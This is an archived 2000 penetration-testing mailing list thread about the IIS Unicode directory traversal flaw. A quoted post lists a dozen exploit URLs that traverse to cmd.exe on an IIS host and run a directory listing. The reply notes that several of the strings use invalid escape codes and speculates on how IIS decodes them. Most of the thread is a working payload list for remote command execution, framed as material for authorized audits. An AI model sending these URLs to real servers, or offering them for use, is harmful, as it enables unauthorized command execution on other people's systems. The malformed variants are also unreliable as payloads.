Home page logo
/

pen-test logo Penetration Testing mailing list archives

Re: [PEN-TEST] IIS UNICODE Strings
From: Vitaly Osipov <vos () TELENOR CZ>
Date: Tue, 31 Oct 2000 21:19:53 +0100

Hmm... I see some *very* strange strings in you examples below, namely
those:



http://address.of.iis5.system/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+d
ir+c:\


http://address.of.iis5.system/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+d
ir+c:\


http://address.of.iis5.system/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+d
ir+c:\


http://address.of.iis5.system/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+d
ir+c:\


the second excaped symbol (%pc for example) is not real escaped hex-code -
if it works, then the problem is not in Unicode at all, but in something
else - maybe IIS interperts anything which is after 0xc1, 0xc0 in some
special way? something like %9v -> 9*0x10+(code for "v" - code for "a") =
0x90 +0x16 = 0xa6? If I have some time tomorrow, I'll try to dissassemble
that dll of IIS which was patched my microsoft and extract a real decoding
algorithm from there...

or maybe OI do not understand something obvious regarding unicode :-S

regards,
Vitaly.


----- Original Message -----
From: "Mike Ahern" <mc_ahern () YAHOO COM>
To: <PEN-TEST () SECURITYFOCUS COM>
Sent: Friday, October 27, 2000 9:35 PM
Subject: [PEN-TEST] IIS UNICODE Strings


I have been trying to track the various strings when I
find them, and here is a list so far. I have tested
many of these and found many to work on systems I am
authorized to audit.

Initial reports seemed to indicate that this was
predominately a foreign (non US English) web server
problem, however I have found that there are many
vulnerable US English servers. In initial tests I
found one non-US web site and three US web sites
vulnerable for a single client. That made me wonder
how many internal file & print, exchange, sql, and
other servers with IIS installed were vulnerable
within the network. In my testing I have found a good
number of internal US servers vulnerable as well.
Certainly not the majority, but fairly well
represented anyhow.

I suspect this is a partial list of UNICODE strings...

Happy Testing...

-mch



http://address.of.iis5.system/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+d
ir+c:\


http://address.of.iis5.system/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+d
ir+c:\


http://address.of.iis5.system/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+d
ir+c:\


http://address.of.iis5.system/scripts/..%c1%af../winnt/system32/cmd.exe?/c+d
ir+c:\


http://address.of.iis5.system/scripts/..%c0%af../winnt/system32/cmd.exe?/c+d
ir+c:\


http://address.of.iis5.system/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+d
ir+c:\


http://address.of.iis5.system/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+d
ir+c:\


http://address.of.iis5.system/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+d
ir+c:\


http://address.of.iis5.system/scripts/..%e0%80%af../winnt/system32/cmd.exe?/
c+dir+c:\


http://address.of.iis5.system/scripts/..%f0%80%80%af../winnt/system32/cmd.ex
e?/c+dir+c:\


http://address.of.iis5.system/scripts/..%f8%80%80%80%af../winnt/system32/cmd
.exe?/c+dir+c:\


http://address.of.iis5.system/scripts/..%fc%80%80%80%80%af../winnt/system32/
cmd.exe?/c+dir+c:\



__________________________________________________
Do You Yahoo!?
Yahoo! Messenger - Talk while you surf!  It's FREE.
http://im.yahoo.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault